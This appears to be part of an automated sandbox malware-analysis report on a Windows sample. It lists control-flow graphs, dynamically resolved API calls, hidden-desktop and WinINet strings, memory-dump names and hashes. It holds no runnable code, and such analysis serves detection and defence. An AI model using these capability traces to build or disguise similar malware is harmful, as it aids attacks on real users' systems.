                                control_flow_graph 633 4f66e0-4f66e7 634 4f6afe-4f6b92 LoadLibraryA * 8 633->634 635 4f66ed-4f6af9 GetProcAddress * 43 633->635 636 4f6c08-4f6c0f 634->636 637 4f6b94-4f6c03 GetProcAddress * 5 634->637 635->634 638 4f6c15-4f6ccd GetProcAddress * 8 636->638 639 4f6cd2-4f6cd9 636->639 637->636 638->639 640 4f6d4f-4f6d56 639->640 641 4f6cdb-4f6d4a GetProcAddress * 5 639->641 642 4f6d5c-4f6de4 GetProcAddress * 6 640->642 643 4f6de9-4f6df0 640->643 641->640 642->643 644 4f6df6-4f6f0b GetProcAddress * 12 643->644 645 4f6f10-4f6f17 643->645 644->645 646 4f6f8d-4f6f94 645->646 647 4f6f19-4f6f88 GetProcAddress * 5 645->647 648 4f6f96-4f6fbc GetProcAddress * 2 646->648 649 4f6fc1-4f6fc8 646->649 647->646 648->649 650 4f6fca-4f6ff0 GetProcAddress * 2 649->650 651 4f6ff5-4f6ffc 649->651 650->651 652 4f70ed-4f70f4 651->652 653 4f7002-4f70e8 GetProcAddress * 10 651->653 654 4f70f6-4f714d GetProcAddress * 4 652->654 655 4f7152-4f7159 652->655 653->652 654->655 656 4f716e-4f7175 655->656 657 4f715b-4f7169 GetProcAddress 655->657 658 4f7177-4f71ce GetProcAddress * 4 656->658 659 4f71d3 656->659 657->656 658->659
                                APIs
                                • GetProcAddress.KERNEL32(76210000,00CE6598), ref: 004F66F5
                                • GetProcAddress.KERNEL32(76210000,00CE6798), ref: 004F670D
                                • GetProcAddress.KERNEL32(76210000,00CF9848), ref: 004F6726
                                • GetProcAddress.KERNEL32(76210000,00CF9818), ref: 004F673E
                                • GetProcAddress.KERNEL32(76210000,00CF9860), ref: 004F6756
                                • GetProcAddress.KERNEL32(76210000,00CFD980), ref: 004F676F
                                • GetProcAddress.KERNEL32(76210000,00CEA638), ref: 004F6787
                                • GetProcAddress.KERNEL32(76210000,00CFD9F8), ref: 004F679F
                                • GetProcAddress.KERNEL32(76210000,00CFD968), ref: 004F67B8
                                • GetProcAddress.KERNEL32(76210000,00CFD998), ref: 004F67D0
                                • GetProcAddress.KERNEL32(76210000,00CFD9B0), ref: 004F67E8
                                • GetProcAddress.KERNEL32(76210000,00CE6518), ref: 004F6801
                                • GetProcAddress.KERNEL32(76210000,00CE6858), ref: 004F6819
                                • GetProcAddress.KERNEL32(76210000,00CE6878), ref: 004F6831
                                • GetProcAddress.KERNEL32(76210000,00CE6658), ref: 004F684A
                                • GetProcAddress.KERNEL32(76210000,00CFDB18), ref: 004F6862
                                • GetProcAddress.KERNEL32(76210000,00CFD890), ref: 004F687A
                                • GetProcAddress.KERNEL32(76210000,00CEA7A0), ref: 004F6893
                                • GetProcAddress.KERNEL32(76210000,00CE67D8), ref: 004F68AB
                                • GetProcAddress.KERNEL32(76210000,00CFDA88), ref: 004F68C3
                                • GetProcAddress.KERNEL32(76210000,00CFD950), ref: 004F68DC
                                • GetProcAddress.KERNEL32(76210000,00CFDAA0), ref: 004F68F4
                                • GetProcAddress.KERNEL32(76210000,00CFDB60), ref: 004F690C
                                • GetProcAddress.KERNEL32(76210000,00CE6838), ref: 004F6925
                                • GetProcAddress.KERNEL32(76210000,00CFD878), ref: 004F693D
                                • GetProcAddress.KERNEL32(76210000,00CFDA70), ref: 004F6955
                                • GetProcAddress.KERNEL32(76210000,00CFDAE8), ref: 004F696E
                                • GetProcAddress.KERNEL32(76210000,00CFD938), ref: 004F6986
                                • GetProcAddress.KERNEL32(76210000,00CFD9C8), ref: 004F699E
                                • GetProcAddress.KERNEL32(76210000,00CFD8C0), ref: 004F69B7
                                • GetProcAddress.KERNEL32(76210000,00CFDB00), ref: 004F69CF
                                • GetProcAddress.KERNEL32(76210000,00CFD8A8), ref: 004F69E7
                                • GetProcAddress.KERNEL32(76210000,00CFD9E0), ref: 004F6A00
                                • GetProcAddress.KERNEL32(76210000,00CEFCE8), ref: 004F6A18
                                • GetProcAddress.KERNEL32(76210000,00CFDB30), ref: 004F6A30
                                • GetProcAddress.KERNEL32(76210000,00CFDA28), ref: 004F6A49
                                • GetProcAddress.KERNEL32(76210000,00CE64D8), ref: 004F6A61
                                • GetProcAddress.KERNEL32(76210000,00CFD8D8), ref: 004F6A79
                                • GetProcAddress.KERNEL32(76210000,00CE65B8), ref: 004F6A92
                                • GetProcAddress.KERNEL32(76210000,00CFDA10), ref: 004F6AAA
                                • GetProcAddress.KERNEL32(76210000,00CFDA40), ref: 004F6AC2
                                • GetProcAddress.KERNEL32(76210000,00CE6618), ref: 004F6ADB
                                • GetProcAddress.KERNEL32(76210000,00CE64F8), ref: 004F6AF3
                                • LoadLibraryA.KERNEL32(00CFDA58,004F051F), ref: 004F6B05
                                • LoadLibraryA.KERNEL32(00CFDB48), ref: 004F6B16
                                • LoadLibraryA.KERNEL32(00CFDAB8), ref: 004F6B28
                                • LoadLibraryA.KERNEL32(00CFDAD0), ref: 004F6B3A
                                • LoadLibraryA.KERNEL32(00CFD8F0), ref: 004F6B4B
                                • LoadLibraryA.KERNEL32(00CFD908), ref: 004F6B5D
                                • LoadLibraryA.KERNEL32(00CFD920), ref: 004F6B6F
                                • LoadLibraryA.KERNEL32(00CFDCE0), ref: 004F6B80
                                • GetProcAddress.KERNEL32(751E0000,00CE6258), ref: 004F6B9C
                                • GetProcAddress.KERNEL32(751E0000,00CFDE30), ref: 004F6BB4
                                • GetProcAddress.KERNEL32(751E0000,00CF90B0), ref: 004F6BCD
                                • GetProcAddress.KERNEL32(751E0000,00CFDD40), ref: 004F6BE5
                                • GetProcAddress.KERNEL32(751E0000,00CE6338), ref: 004F6BFD
                                • GetProcAddress.KERNEL32(70150000,00CEA5E8), ref: 004F6C1D
                                • GetProcAddress.KERNEL32(70150000,00CE6418), ref: 004F6C35
                                • GetProcAddress.KERNEL32(70150000,00CEA610), ref: 004F6C4E
                                • GetProcAddress.KERNEL32(70150000,00CFDD58), ref: 004F6C66
                                • GetProcAddress.KERNEL32(70150000,00CFDC68), ref: 004F6C7E
                                • GetProcAddress.KERNEL32(70150000,00CE62F8), ref: 004F6C97
                                • GetProcAddress.KERNEL32(70150000,00CE6438), ref: 004F6CAF
                                • GetProcAddress.KERNEL32(70150000,00CFDE00), ref: 004F6CC7
                                • GetProcAddress.KERNEL32(753A0000,00CE6458), ref: 004F6CE3
                                • GetProcAddress.KERNEL32(753A0000,00CE6478), ref: 004F6CFB
                                • GetProcAddress.KERNEL32(753A0000,00CFDC08), ref: 004F6D14
                                • GetProcAddress.KERNEL32(753A0000,00CFDDE8), ref: 004F6D2C
                                • GetProcAddress.KERNEL32(753A0000,00CE6198), ref: 004F6D44
                                • GetProcAddress.KERNEL32(76310000,00CEA688), ref: 004F6D64
                                • GetProcAddress.KERNEL32(76310000,00CEA7F0), ref: 004F6D7C
                                • GetProcAddress.KERNEL32(76310000,00CFDE18), ref: 004F6D95
                                • GetProcAddress.KERNEL32(76310000,00CE6298), ref: 004F6DAD
                                • GetProcAddress.KERNEL32(76310000,00CE63D8), ref: 004F6DC5
                                • GetProcAddress.KERNEL32(76310000,00CEA778), ref: 004F6DDE
                                • GetProcAddress.KERNEL32(76910000,00CFDBF0), ref: 004F6DFE
                                • GetProcAddress.KERNEL32(76910000,00CE6398), ref: 004F6E16
                                • GetProcAddress.KERNEL32(76910000,00CF92A0), ref: 004F6E2F
                                • GetProcAddress.KERNEL32(76910000,00CFDC80), ref: 004F6E47
                                • GetProcAddress.KERNEL32(76910000,00CFDD28), ref: 004F6E5F
                                • GetProcAddress.KERNEL32(76910000,00CE6218), ref: 004F6E78
                                • GetProcAddress.KERNEL32(76910000,00CE6238), ref: 004F6E90
                                • GetProcAddress.KERNEL32(76910000,00CFDE60), ref: 004F6EA8
                                • GetProcAddress.KERNEL32(76910000,00CFDB78), ref: 004F6EC1
                                • GetProcAddress.KERNEL32(76910000,CreateDesktopA), ref: 004F6ED7
                                • GetProcAddress.KERNEL32(76910000,OpenDesktopA), ref: 004F6EEE
                                • GetProcAddress.KERNEL32(76910000,CloseDesktop), ref: 004F6F05
                                • GetProcAddress.KERNEL32(75B30000,00CE6498), ref: 004F6F21
                                • GetProcAddress.KERNEL32(75B30000,00CFDC38), ref: 004F6F39
                                • GetProcAddress.KERNEL32(75B30000,00CFDD70), ref: 004F6F52
                                • GetProcAddress.KERNEL32(75B30000,00CFDD88), ref: 004F6F6A
                                • GetProcAddress.KERNEL32(75B30000,00CFDD10), ref: 004F6F82
                                • GetProcAddress.KERNEL32(75670000,00CE62D8), ref: 004F6F9E
                                • GetProcAddress.KERNEL32(75670000,00CE6378), ref: 004F6FB6
                                • GetProcAddress.KERNEL32(76AC0000,00CE63B8), ref: 004F6FD2
                                • GetProcAddress.KERNEL32(76AC0000,00CFDC98), ref: 004F6FEA
                                • GetProcAddress.KERNEL32(6F4E0000,00CE6278), ref: 004F700A
                                • GetProcAddress.KERNEL32(6F4E0000,00CE6118), ref: 004F7022
                                • GetProcAddress.KERNEL32(6F4E0000,00CE63F8), ref: 004F703B
                                • GetProcAddress.KERNEL32(6F4E0000,00CFDCF8), ref: 004F7053
                                • GetProcAddress.KERNEL32(6F4E0000,00CE64B8), ref: 004F706B
                                • GetProcAddress.KERNEL32(6F4E0000,00CE61B8), ref: 004F7084
                                • GetProcAddress.KERNEL32(6F4E0000,00CE6178), ref: 004F709C
                                • GetProcAddress.KERNEL32(6F4E0000,00CE6318), ref: 004F70B4
                                • GetProcAddress.KERNEL32(6F4E0000,InternetSetOptionA), ref: 004F70CB
                                • GetProcAddress.KERNEL32(6F4E0000,HttpQueryInfoA), ref: 004F70E2
                                • GetProcAddress.KERNEL32(75AE0000,00CFDCB0), ref: 004F70FE
                                • GetProcAddress.KERNEL32(75AE0000,00CF91C0), ref: 004F7116
                                • GetProcAddress.KERNEL32(75AE0000,00CFDDB8), ref: 004F712F
                                • GetProcAddress.KERNEL32(75AE0000,00CFDC50), ref: 004F7147
                                • GetProcAddress.KERNEL32(76300000,00CE6138), ref: 004F7163
                                • GetProcAddress.KERNEL32(6E9C0000,00CFDDA0), ref: 004F717F
                                • GetProcAddress.KERNEL32(6E9C0000,00CE6158), ref: 004F7197
                                • GetProcAddress.KERNEL32(6E9C0000,00CFDBD8), ref: 004F71B0
                                • GetProcAddress.KERNEL32(6E9C0000,00CFDDD0), ref: 004F71C8
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA
                                • API String ID: 2238633743-3468015613
                                • Opcode ID: 51b28a94928eaa8ee1e6f7b4fd9ee75788c1bacab5202937d368c589c0a35466
                                • Instruction ID: fb1bd5c1635974448ccc5b03dc51345d12f0a630c516874f5252dd6abd572340
                                • Opcode Fuzzy Hash: 51b28a94928eaa8ee1e6f7b4fd9ee75788c1bacab5202937d368c589c0a35466
                                • Instruction Fuzzy Hash: 016230B5611206DFD794DF64EC88A2637B9F788341710CB19EA95C3362EF7CA840DB29
                                Function 004EF1B0 Relevance: 102.7, APIs: 57, Strings: 1, Instructions: 1156stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(004FCFEC), ref: 004EF1D5
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004EF1F1
                                • lstrlen.KERNEL32(004FCFEC), ref: 004EF1FC
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004EF215
                                • lstrlen.KERNEL32(004FCFEC), ref: 004EF220
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004EF239
                                • lstrcpy.KERNEL32(00000000,00504FA0), ref: 004EF25E
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004EF28C
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004EF2C0
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004EF2F0
                                • lstrlen.KERNEL32(00CE6578), ref: 004EF315
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID: ERROR
                                • API String ID: 367037083-2861137601
                                • Opcode ID: 7cd5fe582a13e5f935c1799decc2be24543256f1b71d55d2a4c1719b706e0c15
                                • Instruction ID: b28e6cce474c471ea41a082861f016baf31c7c44de1c2eaf6766bbe1a9920061
                                • Opcode Fuzzy Hash: 7cd5fe582a13e5f935c1799decc2be24543256f1b71d55d2a4c1719b706e0c15
                                • Instruction Fuzzy Hash: 22A26C70A01246DFCB20DF66C958A5BBBB4AF44305F1881BBE849DB362DB39DC45CB58
                                Function 004EFFD0 Relevance: 63.1, APIs: 40, Strings: 1, Instructions: 1571stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004F0013
                                • lstrlen.KERNEL32(004FCFEC), ref: 004F00BD
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004F00E1
                                • lstrlen.KERNEL32(004FCFEC), ref: 004F00EC
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004F0110
                                • lstrlen.KERNEL32(004FCFEC), ref: 004F011B
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004F013F
                                • lstrlen.KERNEL32(004FCFEC), ref: 004F015A
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004F0189
                                • lstrlen.KERNEL32(004FCFEC), ref: 004F0194
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004F01C3
                                • lstrlen.KERNEL32(004FCFEC), ref: 004F01CE
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004F0206
                                • lstrlen.KERNEL32(004FCFEC), ref: 004F0250
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004F0288
                                • lstrcpy.KERNEL32(00000000,?), ref: 004F059B
                                • lstrlen.KERNEL32(00CE6738), ref: 004F05AB
                                • lstrcpy.KERNEL32(00000000,?), ref: 004F05D7
                                • lstrcat.KERNEL32(00000000,?), ref: 004F05E3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004F060E
                                • lstrlen.KERNEL32(00CFF360), ref: 004F0625
                                • lstrcpy.KERNEL32(00000000,?), ref: 004F064C
                                • lstrcat.KERNEL32(00000000,?), ref: 004F0658
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004F0681
                                • lstrlen.KERNEL32(00CE67B8), ref: 004F0698
                                • lstrcpy.KERNEL32(00000000,?), ref: 004F06C9
                                • lstrcat.KERNEL32(00000000,?), ref: 004F06D5
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004F0706
                                • lstrcpy.KERNEL32(00000000,00CF9170), ref: 004F074B
                                  • Part of subcall function 004D1530: lstrcpy.KERNEL32(00000000,?), ref: 004D1557
                                  • Part of subcall function 004D1530: lstrcpy.KERNEL32(00000000,?), ref: 004D1579
                                  • Part of subcall function 004D1530: lstrcpy.KERNEL32(00000000,?), ref: 004D159B
                                  • Part of subcall function 004D1530: lstrcpy.KERNEL32(00000000,?), ref: 004D15FF
                                • lstrcpy.KERNEL32(00000000,?), ref: 004F077F
                                • lstrcpy.KERNEL32(00000000,00CFF0D8), ref: 004F07E7
                                • lstrcpy.KERNEL32(00000000,00CF9300), ref: 004F0858
                                • lstrcpy.KERNEL32(00000000,fplugins), ref: 004F08CF
                                • lstrcpy.KERNEL32(00000000,?), ref: 004F0928
                                • lstrcpy.KERNEL32(00000000,00CF9330), ref: 004F09F8
                                  • Part of subcall function 004D24E0: lstrcpy.KERNEL32(00000000,?), ref: 004D2528
                                  • Part of subcall function 004D24E0: lstrcpy.KERNEL32(00000000,?), ref: 004D254E
                                  • Part of subcall function 004D24E0: lstrcpy.KERNEL32(00000000,?), ref: 004D2577
                                • lstrcpy.KERNEL32(00000000,00CF9400), ref: 004F0ACE
                                • lstrcpy.KERNEL32(00000000,?), ref: 004F0B81
                                • lstrcpy.KERNEL32(00000000,00CF9400), ref: 004F0D58
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$lstrcat
                                • String ID: fplugins
                                • API String ID: 2500673778-38756186
                                • Opcode ID: 4638a827c1dd50bdb34472b441cf537f8fd339e3440d9726bb6559ee7e0e4751
                                • Instruction ID: 51b53fe32c33c268bad1c26248ca31275c8a8146534b088d972f47a184dc6d7d
                                • Opcode Fuzzy Hash: 4638a827c1dd50bdb34472b441cf537f8fd339e3440d9726bb6559ee7e0e4751
                                • Instruction Fuzzy Hash: 07E27A70A05345CFD724DF2AC598B6AB7E0BF88304F58856FD58D8B362DB399841CB4A
                                Function 004EF2F8 Relevance: 30.1, APIs: 16, Strings: 1, Instructions: 391stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(00CE6578), ref: 004EF315
                                • lstrcpy.KERNEL32(00000000,?), ref: 004EF3A3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004EF3C7
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004EF47B
                                • lstrcpy.KERNEL32(00000000,00CE6578), ref: 004EF4BB
                                • lstrcpy.KERNEL32(00000000,00CF91B0), ref: 004EF4EA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004EF59E
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004EF61C
                                • lstrcpy.KERNEL32(00000000,?), ref: 004EF64C
                                • lstrcpy.KERNEL32(00000000,?), ref: 004EF69A
                                • StrCmpCA.SHLWAPI(?,ERROR), ref: 004EF718
                                • lstrlen.KERNEL32(00CF9280), ref: 004EF746
                                • lstrcpy.KERNEL32(00000000,00CF9280), ref: 004EF771
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004EF793
                                • lstrcpy.KERNEL32(00000000,?), ref: 004EF7E4
                                • StrCmpCA.SHLWAPI(?,ERROR), ref: 004EFA32
                                • lstrlen.KERNEL32(00CF9220), ref: 004EFA60
                                • lstrcpy.KERNEL32(00000000,00CF9220), ref: 004EFA8B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004EFAAD
                                • lstrcpy.KERNEL32(00000000,?), ref: 004EFAFE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID: ERROR
                                • API String ID: 367037083-2861137601
                                • Opcode ID: d33f4de970952d94e1a90d2f8a5ee7123e3ef8f2993f7f8082ac0a5edb5e4210
                                • Instruction ID: 739bf3a1807ea45220ab5189ac7865964d31fb12f0aec52afbeb75cbb96f867f
                                • Opcode Fuzzy Hash: d33f4de970952d94e1a90d2f8a5ee7123e3ef8f2993f7f8082ac0a5edb5e4210
                                • Instruction Fuzzy Hash: 6FF15170A01246CFDB24DF66C954A16B7E5BF44316B18C1BFD8099B3A2EB39DC46CB48
                                Function 004E8CA0 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 176COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2721 4e8ca0-4e8cc4 StrCmpCA 2722 4e8ccd-4e8ce6 2721->2722 2723 4e8cc6-4e8cc7 ExitProcess 2721->2723 2725 4e8cec-4e8cf1 2722->2725 2726 4e8ee2-4e8eef call 4d2a20 2722->2726 2727 4e8cf6-4e8cf9 2725->2727 2729 4e8cff 2727->2729 2730 4e8ec3-4e8edc 2727->2730 2732 4e8e6f-4e8e7d StrCmpCA 2729->2732 2733 4e8e88-4e8e9a lstrlen 2729->2733 2734 4e8d06-4e8d15 lstrlen 2729->2734 2735 4e8d84-4e8d92 StrCmpCA 2729->2735 2736 4e8da4-4e8db8 StrCmpCA 2729->2736 2737 4e8dbd-4e8dcb StrCmpCA 2729->2737 2738 4e8ddd-4e8deb StrCmpCA 2729->2738 2739 4e8dfd-4e8e0b StrCmpCA 2729->2739 2740 4e8e1d-4e8e2b StrCmpCA 2729->2740 2741 4e8e3d-4e8e4b StrCmpCA 2729->2741 2742 4e8d5a-4e8d69 lstrlen 2729->2742 2743 4e8e56-4e8e64 StrCmpCA 2729->2743 2744 4e8d30-4e8d3f lstrlen 2729->2744 2730->2726 2770 4e8cf3 2730->2770 2732->2730 2754 4e8e7f-4e8e86 2732->2754 2755 4e8e9c-4e8ea1 call 4d2a20 2733->2755 2756 4e8ea4-4e8eb0 call 4d2930 2733->2756 2750 4e8d1f-4e8d2b call 4d2930 2734->2750 2751 4e8d17-4e8d1c call 4d2a20 2734->2751 2735->2730 2745 4e8d98-4e8d9f 2735->2745 2736->2730 2737->2730 2746 4e8dd1-4e8dd8 2737->2746 2738->2730 2747 4e8df1-4e8df8 2738->2747 2739->2730 2748 4e8e11-4e8e18 2739->2748 2740->2730 2749 4e8e31-4e8e38 2740->2749 2741->2730 2752 4e8e4d-4e8e54 2741->2752 2759 4e8d6b-4e8d70 call 4d2a20 2742->2759 2760 4e8d73-4e8d7f call 4d2930 2742->2760 2743->2730 2753 4e8e66-4e8e6d 2743->2753 2757 4e8d49-4e8d55 call 4d2930 2744->2757 2758 4e8d41-4e8d46 call 4d2a20 2744->2758 2745->2730 2746->2730 2747->2730 2748->2730 2749->2730 2779 4e8eb3-4e8eb5 2750->2779 2751->2750 2752->2730 2753->2730 2754->2730 2755->2756 2756->2779 2757->2779 2758->2757 2759->2760 2760->2779 2770->2727 2779->2730 2780 4e8eb7-4e8eb9 2779->2780 2780->2730 2781 4e8ebb-4e8ebd lstrcpy 2780->2781 2781->2730
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
